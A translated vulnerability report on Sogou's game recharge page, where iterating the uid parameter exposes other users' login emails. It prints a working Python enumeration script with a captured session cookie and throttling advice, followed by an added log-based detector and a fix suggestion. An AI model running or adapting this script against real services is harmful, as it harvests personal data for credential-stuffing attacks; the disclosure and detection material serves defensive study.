Sogou: login email addresses of 60 million users can be enumerated via uid


1. Sogou game center site: http://wan.sogou.com/p/index.do

2. On the recharge page, you can recharge (top up) other users' accounts.

By iterating over the uid parameter here, an attacker can obtain other users' email addresses, which could then be used for brute-force or credential-stuffing attacks.

Testing the uid range shows there are 60 million+ users.

The POST request is as follows (captured as an image in the original post):

The Python script:

# Python 2 script as posted; missing imports, indentation and the broken regex fixed.
import httplib
import re
import urllib

if __name__ == '__main__':
    for i in range(1000):
        # Recharge form fields; 'uid' is the account being recharged and is the
        # value that is enumerated.
        params = urllib.urlencode({'gid': '233', 'sid': '21', 'paygate': '-331',
                                   'amount': '10', 'uid': i})
        headers = {
            "Cookie": "IPLOC=CN2100; SUID=63043D777D23900A000000005552F7EA; SUV=00D766AC773D04635552F7EB7AADD090; usid=63043D7730890E0A000000005563D38A; CNZZDATA1255303155=1173610824-1438220021-%7C1438220021; swfLayer=1; ppinf=5|1438220959|1439430559|Y2xpZW50aWQ6NDoxMTAwfGNydDoxMDoxNDM4MjIwOTU5fHJlZm5pY2s6MDp8dHJ1c3Q6MToxfHVzZXJpZDoxOTpkb250c2F5aGVoZUAxNjMuY29tfHVuaXFuYW1lOjk6MTEyMzQyMzExfA; pprdig=pgpiRH6X-cilVdO8pLT6V2s5gcos7yfRdrabmaNieW1v0MJawaw-M3qUMkNr_hovhIZZ0ZeQsD7yPnehRoZrb5BJA8bY5BDKs1awJwVDqhlPsLplQrsWSXB3hrUYGXTdKKhCgV-a3Pwi6qeSlGF6iJ4lD_qeDE8PifX6cA1GZDA; email=**********; SSUID=BEF747DFDC68FA329D3F93994957BE5A; ppmdig=1438220960000000dd5308bce1c345c0d36e8be0ae55856e; hostid=40731406; JSESSIONID=aaaiTZSNM3yNBghhKPC7u",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "Connection": "keep-alive",
            "Pragma": "no-cache", "Cache-Control": "no-cache", "Accept": "*/*",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3"
            # Accept-Encoding: gzip was dropped: httplib does not decompress the
            # body, so a gzipped response would never match the regex below.
        }

        conn = httplib.HTTPConnection('wan.sogou.com', 80, timeout=2)
        conn.request(method="POST", url="/payconfirm.do", body=params, headers=headers)
        response = conn.getresponse()
        body = response.read()
        conn.close()
        # The confirmation page echoes the target account's email inside the
        # element with id="dUid". The closing tag in the original lookahead was
        # lost in extraction, so the match stops at the next '<' instead.
        usermail = re.findall(r'(?<= id="dUid" class="font-black">).*?(?=<)', body)
        print usermail[0] if usermail else 'uid %d: no email found in response' % i

Proof of vulnerability:

Don't send requests too fast; I ran 100 as a test.
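On the defending side, the sweep above has a clear signature: one session posting to /payconfirm.do for many distinct, mostly consecutive uids. The detector below is an added example, not code from the original post or from Sogou; it assumes a constructed log format in which the application records the session id and the uid field of each recharge request.

```python
import re
from collections import defaultdict

# Constructed sample log (not from the original post): session A1 sweeps
# uid=1..100 in order, B7 and C3 are ordinary recharges, one line is unrelated.
SAMPLE_LINES = (
    ['10.0.0.5 sess=A1 "POST /payconfirm.do" uid=%d' % i for i in range(1, 101)]
    + ['10.0.0.9 sess=B7 "POST /payconfirm.do" uid=12345',
       '10.0.0.9 sess=B7 "POST /payconfirm.do" uid=12345',
       '10.0.0.12 sess=C3 "POST /payconfirm.do" uid=777',
       '10.0.0.12 sess=C3 "POST /payconfirm.do" uid=778',
       '10.0.0.12 sess=C3 "GET /p/index.do"']
)

# Assumed line format: <ip> sess=<session id> "POST /payconfirm.do" uid=<n>
LINE_RE = re.compile(r'^(\S+) sess=(\S+) "POST /payconfirm\.do" uid=(\d+)$')


def parse(lines):
    """Yield (ip, session, uid) for each recharge request; skip other lines."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(2), int(m.group(3))


def find_enumerators(lines, min_distinct=20):
    """Return {session: (distinct_uids, sequential_ratio)} for sessions that
    recharge an abnormal number of different accounts. sequential_ratio is
    the share of consecutive requests whose uid increased by exactly 1; a
    value near 1.0 means a scripted sweep rather than a user with many friends."""
    uids_by_session = defaultdict(list)
    for _ip, sess, uid in parse(lines):
        uids_by_session[sess].append(uid)
    hits = {}
    for sess, uids in uids_by_session.items():
        distinct = len(set(uids))
        if distinct < min_distinct:
            continue
        steps = [b - a for a, b in zip(uids, uids[1:])]
        ratio = sum(1 for s in steps if s == 1) / len(steps) if steps else 0.0
        hits[sess] = (distinct, ratio)
    return hits


if __name__ == '__main__':
    for sess, (n, ratio) in find_enumerators(SAMPLE_LINES).items():
        print('session %s: %d distinct uids, sequential ratio %.2f' % (sess, n, ratio))
```

In practice the same grouping works per source IP or per login, and the recharge page should also stop echoing the target account's email at all, since the payer only needs to confirm the uid they typed.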


Comments: 2 (visitors: 2, author: 0)

    • 日后再说:

      The programmers were just cutting corners too.

      • 王华龙 (reply):

        This one is impressive. Saving it.